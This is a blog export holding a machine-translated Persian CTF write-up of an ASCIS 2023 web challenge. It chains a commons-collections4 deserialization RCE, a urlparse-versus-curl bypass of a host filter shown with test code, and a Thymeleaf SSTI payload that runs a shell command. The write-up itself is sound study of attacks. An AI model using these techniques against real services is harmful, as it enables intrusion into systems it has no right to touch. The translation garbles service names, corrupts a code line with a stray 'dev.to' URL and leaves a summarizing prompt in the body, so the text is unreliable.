{"id":89120,"date":"2024-12-20T20:45:26","date_gmt":"2024-12-20T17:15:26","guid":{"rendered":"https:\/\/nabfollower.com\/blog\/write-up-ascis-2023-40o6\/"},"modified":"2024-12-20T20:45:26","modified_gmt":"2024-12-20T17:15:26","slug":"write-up-ascis-2023-40o6","status":"publish","type":"post","link":"https:\/\/nabfollower.com\/blog\/write-up-ascis-2023-40o6\/","title":{"rendered":"WRITE-UP ASCIS 2023 – \u0627\u0646\u062c\u0645\u0646 DEV"},"content":{"rendered":"

Summarize this content to 400 words in Persian Lang
\n \u0645\u0646 \u0645\u06cc \u062e\u0648\u0627\u0647\u0645 \u0645\u0633\u06cc\u0631 \u062e\u0648\u062f \u0631\u0627 \u062f\u0631 \u0645\u0642\u0627\u0644\u0647 \u0648\u0628 2 \u0628\u0647 \u0627\u0634\u062a\u0631\u0627\u06a9 \u0628\u06af\u0630\u0627\u0631\u0645\u0647\u0646\u06af\u0627\u0645 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0686\u0627\u0644\u0634\u060c \u0648\u0628 \u0633\u0627\u06cc\u062a \u0645\u0648\u0627\u0631\u062f \u0632\u06cc\u0631 \u0631\u0627 \u0646\u0645\u0627\u06cc\u0634 \u0645\u06cc \u062f\u0647\u062f\u062a\u0633\u0648\u0628\u0627 \u062e\u0648\u0627\u0646\u062f\u0646 \u06a9\u062f \u0645\u0646\u0628\u0639\u060c \u062e\u0648\u0627\u0647\u06cc\u062f \u062f\u06cc\u062f \u06a9\u0647 \u0686\u0627\u0644\u0634 \u0634\u0627\u0645\u0644 2 \u0633\u0631\u0648\u06cc\u0633 \u0627\u0633\u062a: \u0628\u0631\u06af\u0634\u062a \u0648 \u062c\u0644\u0648. \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u06cc\u062f \u0628\u0631\u06af\u0634\u062a \u062d\u0627\u0648\u06cc \u067e\u0631\u0686\u0645 \u0627\u0633\u062a\u060c \u0628\u0646\u0627\u0628\u0631\u0627\u06cc\u0646 \u0627\u0628\u062a\u062f\u0627 \u0622\u0646 \u0631\u0627 \u062a\u062c\u0632\u06cc\u0647 \u0648 \u062a\u062d\u0644\u06cc\u0644 \u062e\u0648\u0627\u0647\u0645 \u06a9\u0631\u062f.\u062e\u062f\u0645\u0627\u062a \u0628\u0631\u06af\u0634\u062a \u0646\u0648\u0634\u062a\u0647 \u0634\u062f\u0647 \u062f\u0631 \u062c\u0627\u0648\u0627 \u067e\u0633 \u0627\u0632 \u062f\u06cc\u06a9\u0627\u0645\u067e\u0627\u06cc\u0644\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u06a9\u062f \u0645\u0646\u0628\u0639 \u0631\u0627 \u0628\u062e\u0648\u0627\u0646\u06cc\u0645 \u0648 \u0628\u062f\u0627\u0646\u06cc\u0645 \u06a9\u0647 \u0628\u0631\u0646\u0627\u0645\u0647 \u0627\u0632 \u0646\u0633\u062e\u0647 11 \u062c\u0627\u0648\u0627\u060c \u0641\u0631\u06cc\u0645\u0648\u0631\u06a9 \u0628\u0648\u062a \u0641\u0646\u0631\u06cc \u0628\u0631\u0627\u06cc \u0627\u06cc\u062c\u0627\u062f \u06cc\u06a9 \u0648\u0628 \u0633\u0631\u0648\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f.\u062a\u062d\u0644\u06cc\u0644 \u0633\u0631\u06cc\u0639: \u067e\u0633 \u0627\u0632 \u062e\u0648\u0627\u0646\u062f\u0646 \u06a9\u062f \u0645\u0646\u0628\u0639\u060c \u0645\u062a\u0648\u062c\u0647 \u0634\u062f\u0645 \u06a9\u0647 \u0628\u0631\u0646\u0627\u0645\u0647 \u0627\u0632 \u06cc\u06a9 \u062a\u0627\u0628\u0639 \u0628\u0631\u0627\u06cc \u062c\u062f\u0627\u0633\u0627\u0632\u06cc \u062f\u0627\u062f\u0647 \u0647\u0627\u06cc \u0627\u0631\u0633\u0627\u0644 \u0634\u062f\u0647 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u062a\u0627\u0628\u0639 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u06a9\u0646\u062f. readObject.\u0639\u0644\u0627\u0648\u0647 \u0628\u0631 \u0627\u06cc\u0646\u060c \u0627\u0632 \u0622\u0646\u062c\u0627 \u06a9\u0647 \u0628\u0631\u0646\u0627\u0645\u0647 \u0627\u0632 \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647 \u0642\u062f\u06cc\u0645\u06cc commons-collections4 \u0646\u0633\u062e\u0647 4.0 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u06a9\u0646\u062f => RCE \u0631\u0627 \u0645\u06cc \u062a\u0648\u0627\u0646 \u0628\u0627 \u0631\u0627\u0647 \u0627\u0646\u062f\u0627\u0632\u06cc \u0632\u0646\u062c\u06cc\u0631\u0647 \u0647\u0627\u06cc \u0627\u0628\u0632\u0627\u0631 \u0627\u0646\u062c\u0627\u0645 \u062f\u0627\u062f. \u0627\u06cc\u0646 \u0632\u0646\u062c\u06cc\u0631\u0647\u200c\u0647\u0627\u06cc \u06af\u062c\u062a \u062a\u0648\u0633\u0637 \u0627\u0641\u0631\u0627\u062f \u0632\u06cc\u0627\u062f\u06cc \u0628\u0647 \u0635\u0648\u0631\u062a \u0622\u0646\u0644\u0627\u06cc\u0646 \u062a\u062c\u0632\u06cc\u0647 \u0648 \u062a\u062d\u0644\u06cc\u0644 \u0634\u062f\u0647\u200c\u0627\u0646\u062f\u060c \u0641\u0642\u0637 \u0628\u0627\u06cc\u062f \u0622\u0646\u0647\u0627 \u0631\u0627 \u0628\u0631\u0627\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0628\u06cc\u0627\u0648\u0631\u0645 (\u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u0628\u0647 \u0627\u0628\u0632\u0627\u0631 ysoserial \u0645\u0631\u0627\u062c\u0639\u0647 \u06a9\u0646\u06cc\u062f)!\u0627\u0646\u062c\u0627\u0645 \u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc: \u0628\u0647 \u062f\u0646\u0628\u0627\u0644 \u0627\u06cc\u0646 \u062c\u0647\u062a\u060c \u0645\u0627 \u0628\u0631 \u0631\u0648\u06cc \u06a9\u0646\u062a\u0631\u0644\u0631 “\/ticket\/{info}” \u062a\u0645\u0631\u06a9\u0632 \u062e\u0648\u0627\u0647\u06cc\u0645 \u06a9\u0631\u062f. \u0627\u0628\u062a\u062f\u0627\u060c \u0628\u0631\u0646\u0627\u0645\u0647 \u062f\u0627\u062f\u0647 \u0647\u0627\u06cc \u0627\u0631\u0633\u0627\u0644 \u0634\u062f\u0647 \u0631\u0627 \u0645\u06cc \u06af\u06cc\u0631\u062f\u060c base64 \u0631\u0645\u0632\u06af\u0634\u0627\u06cc\u06cc \u0645\u06cc \u06a9\u0646\u062f \u0648 \u0637\u0648\u0644 \u0631\u0627 \u0628\u0631\u0631\u0633\u06cc \u0645\u06cc \u06a9\u0646\u062f\u060c \u0633\u067e\u0633 gzip \u0631\u0627 \u0627\u0632 \u062d\u0627\u0644\u062a \u0641\u0634\u0631\u062f\u0647 \u062e\u0627\u0631\u062c \u06a9\u0631\u062f\u0647 \u0648 \u0627\u0632 \u062d\u0627\u0644\u062a \u0633\u0631\u06cc\u0627\u0644 \u062e\u0627\u0631\u062c \u0645\u06cc \u06a9\u0646\u062f. \u0628\u0646\u0627\u0628\u0631\u0627\u06cc\u0646 \u067e\u0633 \u0627\u0632 \u0627\u06cc\u062c\u0627\u062f \u0628\u0627\u0631 \u0622\u0631\u0627\u06cc\u0647 \u0628\u0627\u06cc\u062a\u06cc\u060c \u0628\u0627\u06cc\u062f gzip \u0648 \u0633\u067e\u0633 base64 \u06a9\u062f\u06af\u0630\u0627\u0631\u06cc \u06a9\u0646\u06cc\u0645 \u062a\u0627 \u0628\u0647 \u0633\u0631\u0648\u0631 \u0627\u0631\u0633\u0627\u0644 \u0634\u0648\u062f – \u067e\u0633 \u0627\u0632 gzip\u060c \u067e\u0633 \u0627\u0632 gzip\u060c \u067e\u0633 \u0627\u0632 gzip\u060c payload \u0642\u0628\u0644 \u0627\u0632 \u06a9\u062f\u06af\u0630\u0627\u0631\u06cc base64 \u0628\u0627 2048 \u06a9\u0627\u0631\u0627\u06a9\u062a\u0631 \u0645\u062d\u062f\u0648\u062f \u0645\u06cc \u0634\u0648\u062f. \u0628\u0627 \u0627\u06cc\u0646 \u062d\u0627\u0644\u060c \u0632\u0645\u0627\u0646\u06cc \u06a9\u0647 \u0622\u0646 \u0631\u0627 \u0622\u0632\u0645\u0627\u06cc\u0634 \u06a9\u0631\u062f\u0645\u060c \u067e\u0633 \u0627\u0632 gzip\u060c \u062d\u062c\u0645 \u0628\u0627\u0631 \u0628\u0633\u06cc\u0627\u0631 \u06a9\u0648\u0686\u06a9\u062a\u0631 \u0628\u0648\u062f\u060c \u0648 \u0627\u0632 2048 \u06a9\u0627\u0631\u0627\u06a9\u062a\u0631 \u062a\u062c\u0627\u0648\u0632 \u0646\u0645\u06cc \u06a9\u0631\u062f\u060c \u0628\u0646\u0627\u0628\u0631\u0627\u06cc\u0646 \u0646\u06cc\u0627\u0632\u06cc \u0628\u0647 \u0646\u06af\u0631\u0627\u0646\u06cc \u062f\u0631 \u0645\u0648\u0631\u062f \u062f\u0648\u0631 \u0632\u062f\u0646 \u0686\u06cc\u0632\u06cc \u0646\u0628\u0648\u062f (\u062f\u0631 \u0627\u06cc\u0646 \u0642\u0633\u0645\u062a \u0627\u062d\u0633\u0627\u0633 \u0622\u0634\u0646\u0627\u06cc\u06cc \u062f\u0627\u0634\u062a\u0645\u060c \u0628\u0647 \u0646\u0638\u0631 \u0645\u06cc \u0631\u0633\u06cc\u062f \u06a9\u0647 \u0627\u06cc\u0646 \u0645\u0648\u0636\u0648\u0639 \u0634\u0628\u06cc\u0647 \u0622\u0647\u0646\u06af \u062e\u0637\u0631 \u0627\u0633\u062a) \u0633\u0627\u0644 2022 \u062f\u0631\u0633\u062a\u0647\u061f!).\u06cc\u0647 \u0686\u06cc\u0632 \u062f\u06cc\u06af\u0647 \u0627\u06cc\u0646\u06a9\u0647 \u0645\u0646 \u0645\u06cc\u062e\u0648\u0627\u0645 \u067e\u06cc\u0644\u0648\u062f \u0631\u0648 \u0641\u0642\u0637 \u06cc\u06a9\u0628\u0627\u0631 \u0627\u062c\u0631\u0627 \u06a9\u0646\u0645 \u062a\u0627 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0646\u0634\u0647 \u0648 \u062f\u0631 \u0639\u06cc\u0646 \u062d\u0627\u0644 \u0628\u062f\u0648\u0646 \u0647\u06cc\u0686 \u0627\u0642\u062f\u0627\u0645 \u062f\u06cc\u06af\u0647 \u0627\u06cc \u067e\u0631\u0686\u0645 \u0628\u0647 \u0633\u0631\u0648\u0631 \u0627\u0631\u0633\u0627\u0644 \u0628\u0634\u0647\u060c \u0686\u06cc\u06a9\u0627\u0631 \u06a9\u0646\u0645\u061f \u0645\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u06cc\u06a9 \u062f\u0631\u0628 \u067e\u0634\u062a\u06cc \u0646\u0635\u0628 \u06a9\u0646\u06cc\u0645\u060c \u0627\u0645\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u0622\u0646 \u0631\u0627 \u0633\u0627\u062f\u0647\u200c\u062a\u0631 \u0628\u0627 \u062a\u0646\u0638\u06cc\u0645 \u06cc\u06a9 \u062a\u0627\u06cc\u0645\u0631 \u0628\u0631\u0627\u06cc \u0648\u0628\u200c\u0633\u0631\u0648\u0631 \u062c\u0627\u0648\u0627 \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u06cc\u0645 \u062a\u0627 \u067e\u0631\u0686\u0645 \u0631\u0627 \u0628\u062e\u0648\u0627\u0646\u062f \u0648 \u0628\u0647 \u0637\u0648\u0631 \u0645\u0633\u0627\u0648\u06cc \u062f\u0631 \u0641\u0648\u0627\u0635\u0644 \u0632\u0645\u0627\u0646\u06cc \u0645\u0639\u06cc\u0646 \u0627\u0631\u0633\u0627\u0644 \u06a9\u0646\u062f. \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0632\u0646\u062c\u06cc\u0631\u0647 \u06af\u062c\u062a commons-collections4\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u0628\u0647 \u0631\u0627\u062d\u062a\u06cc \u06a9\u0644\u0627\u0633 \u062c\u0627\u0648\u0627\u06cc \u062e\u0648\u062f \u062a\u0639\u0631\u06cc\u0641 \u0634\u062f\u0647 \u0631\u0627 \u0628\u0627\u0631\u06af\u06cc\u0631\u06cc \u06a9\u0646\u06cc\u0645 \u0648 \u06a9\u062f \u062c\u0627\u0648\u0627 \u062f\u0644\u062e\u0648\u0627\u0647 \u0631\u0627 \u0627\u062c\u0631\u0627 \u06a9\u0646\u06cc\u0645. \u0627\u06cc\u0646 \u0628\u0647 \u0644\u0637\u0641 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06a9\u0644\u0627\u0633 \u0627\u0633\u062a InvokerTransformer \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647 Commons-Collections4.\u0628\u0646\u0627\u0628\u0631\u0627\u06cc\u0646 \u0645\u062d\u0645\u0648\u0644\u0647 \u0631\u0627 \u0645\u06cc \u062a\u0648\u0627\u0646 \u0628\u0647 \u0635\u0648\u0631\u062a \u0632\u06cc\u0631 \u06a9\u062f\u06af\u0630\u0627\u0631\u06cc \u06a9\u0631\u062f\u0628\u0627 \u0627\u06cc\u0646 \u062d\u0627\u0644\u060c RCE \u062a\u0645\u0627\u0645 \u0646\u0634\u062f\u0647 \u0627\u0633\u062a – \u0633\u0631\u0648\u06cc\u0633 \u0628\u0631\u06af\u0634\u062a\u06cc \u062f\u0631 \u06cc\u06a9 \u0641\u0627\u06cc\u0644 docker \u0628\u062f\u0648\u0646 \u067e\u0648\u0631\u062a \u0639\u0645\u0648\u0645\u06cc \u0648 \u0628\u062f\u0648\u0646 \u0627\u062a\u0635\u0627\u0644 \u0628\u0647 \u0627\u06cc\u0646\u062a\u0631\u0646\u062a \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0634\u062f\u0647 \u0627\u0633\u062a! \u0628\u0646\u0627\u0628\u0631\u0627\u06cc\u0646 \u0686\u06af\u0648\u0646\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u0628\u0647 \u0645\u062d\u0645\u0648\u0644\u0647\u200c\u0647\u0627 \u062f\u0633\u062a\u0631\u0633\u06cc \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u06cc\u0645 \u0648 \u0622\u0646\u200c\u0647\u0627 \u0631\u0627 \u0627\u0631\u0633\u0627\u0644 \u06a9\u0646\u06cc\u0645\u061f \u0645\u0627 \u0628\u0627\u06cc\u062f \u0628\u0647 \u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u0633\u0631\u0648\u06cc\u0633 \u0627\u062f\u0627\u0645\u0647 \u062f\u0647\u06cc\u0645 \u062c\u0644\u0648.\u067e\u0633 \u0627\u0632 \u062e\u0648\u0627\u0646\u062f\u0646 \u06a9\u062f \u0645\u0646\u0628\u0639\u060c \u0645\u062a\u0648\u062c\u0647 \u0634\u062f\u0645 \u06a9\u0647 serice \u062a\u0627\u0628\u0639 curl \u0641\u0631\u0645\u0627\u0646 \u067e\u0648\u0633\u062a\u0647 \u0631\u0627 \u0628\u0627 \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc \u06a9\u0647 URL \u0627\u0631\u0633\u0627\u0644 \u0634\u062f\u0647 \u0627\u0633\u062a \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc \u0645\u06cc \u06a9\u0646\u062f => 90% SSRF \u0628\u0631\u0627\u06cc \u0627\u06cc\u062c\u0627\u062f \u062e\u0637\u0627\u0647\u0627\u06cc \u0633\u0631\u0648\u0631 \u0627\u0633\u062a. \u0628\u0631\u06af\u0634\u062a. \u0628\u0627 \u0627\u06cc\u0646 \u062d\u0627\u0644\u060c \u06a9\u062f \u0645\u0646\u0628\u0639 \u0646\u06cc\u0632 \u0628\u0631\u0627\u06cc \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u0627\u0632 \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0622\u0646 \u062e\u0637\u0627 \u0641\u06cc\u0644\u062a\u0631 \u0645\u06cc \u0634\u0648\u062f!<\/p>\n

FILTERED_HOSTS = [“back”]\nFILTERED_PATHS = [“debug”, “info”, “ticket”]\ndef is_approved(url):
\n “””Indicates whether the given URL is allowed to be fetched. This
\n prevents the server from becoming an open proxy”””
\n parts = urlparse(url)
\n host = parts.hostname
\n path = parts.path<\/p>\n

if not parts.scheme in [“http”, “https”]:
\n return False<\/p>\n

if host in FILTERED_HOSTS:
\n return False
\n for filter_path in FILTERED_PATHS:
\n if filter_path in path:
\n return False
\n return True<\/p>\n

\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/p>\n

\u0628\u0631\u0627\u06cc \u062f\u0648\u0631 \u0632\u062f\u0646 \u0627\u06cc\u0646 \u062a\u0627\u0628\u0639 \u0628\u0631\u0631\u0633\u06cc\u060c \u0628\u0627\u06cc\u062f \u062a\u0641\u0627\u0648\u062a \u0628\u06cc\u0646 \u062a\u062c\u0632\u06cc\u0647 url \u062a\u0627\u0628\u0639 urlparse \u062f\u0631 \u067e\u0627\u06cc\u062a\u0648\u0646 \u0648 \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647 curl \u062f\u0631 \u0644\u06cc\u0646\u0648\u06a9\u0633 \u0631\u0627 \u067e\u06cc\u062f\u0627 \u06a9\u0646\u06cc\u0645.+\u060c Bypass host: \u062a\u0627\u0628\u0639 urlparse \u0628\u0627 \u0627\u0633\u062a\u0627\u0646\u062f\u0627\u0631\u062f \u0642\u0627\u0644\u0628 \u0632\u06cc\u0631 \u0645\u0637\u0627\u0628\u0642\u062a \u062f\u0627\u0631\u062f\u0628\u0627 \u0627\u06cc\u0646 \u062d\u0627\u0644\u060c \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647 curl \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc \u062f\u0647\u062f 1\u060c 2 \u06cc\u0627 3 \u0627\u0633\u0644\u0634 \u0628\u0639\u062f \u0627\u0632 \u06a9\u0648\u0644\u0648\u0646.(\u0645\u0646\u0628\u0639 https:\/\/curl.se\/docs\/url-syntax.html)\u0628\u0646\u0627\u0628\u0631\u0627\u06cc\u0646\u060c \u0627\u06af\u0631 url \u062f\u0627\u0631\u0627\u06cc \u0641\u0631\u0645 \u0647\u0627\u06cc http:\/back \u0648 http:\/\/\/back \u0628\u0627\u0634\u062f\u060c \u062a\u0627\u0628\u0639 urlparse \u067e\u0633 \u0627\u0632 \u062a\u062c\u0632\u06cc\u0647 url\u060c \u0645\u06cc\u0632\u0628\u0627\u0646 \u0631\u0627 \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 None \u062f\u0631 \u0646\u0638\u0631 \u0645\u06cc \u06af\u06cc\u0631\u062f\u060c \u062f\u0631 \u062d\u0627\u0644\u06cc \u06a9\u0647 \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647 curl \u0647\u0645\u0686\u0646\u0627\u0646 \u0645\u06cc\u0632\u0628\u0627\u0646 \u0631\u0627 \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 \u062a\u062c\u0632\u06cc\u0647 \u0645\u06cc \u06a9\u0646\u062f. \u0628\u0631\u06af\u0634\u062a!<\/p>\n

#! \/home\/app\/venv\/bin\/python3 test.py
\nparts = urlparse(“http:\/back”)
\nhost = parts.hostname
\nprint(host)<\/p>\n

\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/p>\n

$ python3 test.py
\nNone
\n$ curl http:\/back
\n<!DOCTYPE HTML><\/p>\n

<head>
\n Hello ASCIS
\n =”Content-Type” content=”text\/html; charset=UTF-8″ \/><\/p>\n

$<\/p>\n

\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/p>\n

+\u060c \u0645\u0633\u06cc\u0631 Bypass: \u0627\u0632 \u0622\u0646\u062c\u0627\u06cc\u06cc \u06a9\u0647 curl \u062f\u0648\u0628\u0627\u0631\u0647 \u0622\u062f\u0631\u0633 \u0648\u0631\u0648\u062f\u06cc \u0631\u0627 \u0631\u0645\u0632\u06af\u0634\u0627\u06cc\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u0641\u0642\u0637 \u0628\u0627\u06cc\u062f \u062d\u062f\u0627\u0642\u0644 \u06cc\u06a9 \u06a9\u0627\u0631\u0627\u06a9\u062a\u0631 \u0627\u0632 \u0645\u0633\u06cc\u0631 \u0631\u0627 \u062f\u0648 \u0628\u0631\u0627\u0628\u0631 \u06a9\u0646\u06cc\u0645 \u0648 \u06a9\u0627\u0631 \u0634\u0645\u0627 \u062a\u0645\u0627\u0645 \u0634\u062f!\u0645\u0634\u06a9\u0644 \u062f\u06cc\u06af\u0631 \u0633\u0631\u0648\u06cc\u0633 \u0627\u0633\u062a \u0628\u0631\u06af\u0634\u062a \u0627\u06cc\u0646\u062a\u0631\u0646\u062a \u0648\u062c\u0648\u062f \u0646\u062f\u0627\u0631\u062f\u060c \u0628\u0646\u0627\u0628\u0631\u0627\u06cc\u0646 \u0645\u06cc \u062a\u0648\u0627\u0646\u06cc\u0645 \u0627\u0632 \u062e\u0637\u0627\u06cc SSRF \u0628\u0627\u0644\u0627 \u0628\u0631\u0627\u06cc \u062f\u0631\u06cc\u0627\u0641\u062a \u0627\u0632 \u0633\u0631\u0648\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645 \u0628\u0631\u06af\u0634\u062a \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc api \u0628\u0647 \u0633\u0631\u0648\u0631 \u062c\u0644\u0648\u060c \u0627\u0631\u0633\u0627\u0644 URL \u0622\u062f\u0631\u0633 \u0633\u0631\u0648\u0631 \u0645\u0627 \u0628\u0627 \u06cc\u06a9 \u067e\u0631\u0686\u0645 \u0627\u0633\u062a.\u0627\u0646\u062c\u0627\u0645 \u0645\u0627\u06cc\u0646\u06cc\u0646\u06af\u067e\u0631\u0686\u0645 \u0631\u0627 \u0628\u06af\u06cc\u0631\u06cc\u062f \u0648 \u0628\u0647 \u0622\u0646 \u0634\u0644\u06cc\u06a9 \u06a9\u0646\u06cc\u062f\u067e\u0633 \u0627\u0632 \u0627\u062a\u0645\u0627\u0645 \u0645\u0633\u0627\u0628\u0642\u0647\u060c \u062f\u0631 \u0645\u0648\u0631\u062f \u062e\u062f\u0645\u0627\u062a \u0628\u06cc\u0634\u062a\u0631 \u06cc\u0627\u062f \u06af\u0631\u0641\u062a\u0645 \u0628\u0631\u06af\u0634\u062a RCE \u0647\u0645\u0686\u0646\u06cc\u0646 \u0645\u06cc \u062a\u0648\u0627\u0646\u062f \u062a\u0648\u0633\u0637 \u0628\u0627\u06af SSTI \u062f\u0631 \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647 Thymeleaf \u0645\u0648\u0631\u062f \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0642\u0631\u0627\u0631 \u06af\u06cc\u0631\u062f. \u0628\u0647 \u0637\u0648\u0631 \u0645\u0634\u062e\u0635 \u062f\u0631 \u0628\u0646\u062f \u0632\u06cc\u0631:\u0627\u06cc\u0646 \u062e\u0637\u0627 \u0628\u0647 \u0627\u06cc\u0646 \u062f\u0644\u06cc\u0644 \u0627\u0633\u062a \u06a9\u0647 Thymeleaf \u0627\u06af\u0631 \u0628\u0631 \u0627\u0633\u0627\u0633 \u0627\u0633\u062a\u0627\u0646\u062f\u0627\u0631\u062f \u062a\u062c\u0632\u06cc\u0647 \u0645\u0634\u062e\u0635 \u0634\u062f\u0647 \u062a\u0648\u0633\u0637 \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647 \u0646\u0648\u0634\u062a\u0647 \u0634\u062f\u0647 \u0628\u0627\u0634\u062f\u060c eval \u0631\u0634\u062a\u0647 \u0646\u0627\u0645 \u0627\u0644\u06af\u0648 \u0631\u0627 \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc \u062f\u0647\u062f (\u0634\u0645\u0627 \u0645\u06cc \u062a\u0648\u0627\u0646\u06cc\u062f \u062f\u0631 \u0627\u06cc\u0646\u062c\u0627 \u0628\u06cc\u0634\u062a\u0631 \u0628\u062e\u0648\u0627\u0646\u06cc\u062f).\u0633\u0627\u062e\u062a \u0628\u0627\u0631<\/p>\n

byte[] data = “{\\”role\\”:\\”__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(‘touch \/tmp\/zz’).getInputStream()).next()}__::z\\”}”.getBytes();
\nbyte[] outBase64 = Base64.getMimeEncoder().encode(data);
\nString payload = (new String(outBase64)).replaceAll( “\\\\r\\\\n”, “”).replaceAll( “https:\/\/dev.to\/”, “_”);<\/p>\n

\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u0646\u062c\u0627\u0645 \u0645\u0627\u06cc\u0646\u06cc\u0646\u06af<\/p>\n

$ ls -lap \/tmp
\ntotal 24
\ndrwxrwxrwt 1 root root 4096 Nov 14 17:15 .\/
\ndrwxr-xr-x 1 root root 4096 Nov 14 17:14 ..\/
\ndrwxr-xr-x 2 app app 4096 Nov 14 17:14 hsperfdata_app\/
\n-rw-r–r– 1 app app 0 Nov 14 17:15 zz
\n$<\/p>\n

\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/p>\n

\u062e\u0648\u0627\u0646\u062f\u0646 \u067e\u0631\u0686\u0645 \u0648 \u0627\u0631\u0633\u0627\u0644 \u0622\u0646 \u0628\u0647 \u0633\u0631\u0648\u0631 \u0645\u0634\u0627\u0628\u0647 \u0645\u0648\u0627\u0631\u062f \u0641\u0648\u0642 \u0627\u0633\u062a<\/p>\n

\u0627\u0632 \u0627\u0648\u0644 \u062a\u0627 \u0622\u062e\u0631 \u0645\u0633\u0627\u0628\u0642\u0627\u062a \u0641\u0642\u0637 \u0628\u0644\u062f \u0628\u0648\u062f\u0645 \u062d\u0645\u0644\u0647 \u06a9\u0646\u0645 \u0648 \u0645\u062f\u0627\u0645 \u0645\u0648\u0631\u062f \u062d\u0645\u0644\u0647 \u0642\u0631\u0627\u0631 \u0628\u06af\u06cc\u0631\u0645… \u062f\u0631 \u0646\u0647\u0627\u06cc\u062a \u0646\u062a\u0627\u06cc\u062c \u062e\u06cc\u0644\u06cc \u062e\u0648\u0628 \u0646\u0628\u0648\u062f. \u0645\u0646 \u0646\u0645\u06cc \u062f\u0627\u0646\u0645 \u0633\u0641\u0631 CTF \u0686\u0642\u062f\u0631 \u0637\u0648\u0644\u0627\u0646\u06cc \u0628\u0648\u062f\u0647 \u0627\u0633\u062a\u060c \u0627\u0645\u0627 \u062a\u0627 \u0628\u0647 \u0627\u0645\u0631\u0648\u0632 \u0647\u0646\u0648\u0632 \u0628\u0631\u0627\u06cc \u062a\u06cc\u0645 \u06cc\u06a9 \u0645\u0648\u0641\u0642\u06cc\u062a \u0627\u0633\u062a \u2639.<\/p>\n

\n


\u0645\u0646 \u0645\u06cc \u062e\u0648\u0627\u0647\u0645 \u0645\u0633\u06cc\u0631 \u062e\u0648\u062f \u0631\u0627 \u062f\u0631 \u0645\u0642\u0627\u0644\u0647 \u0648\u0628 2 \u0628\u0647 \u0627\u0634\u062a\u0631\u0627\u06a9 \u0628\u06af\u0630\u0627\u0631\u0645
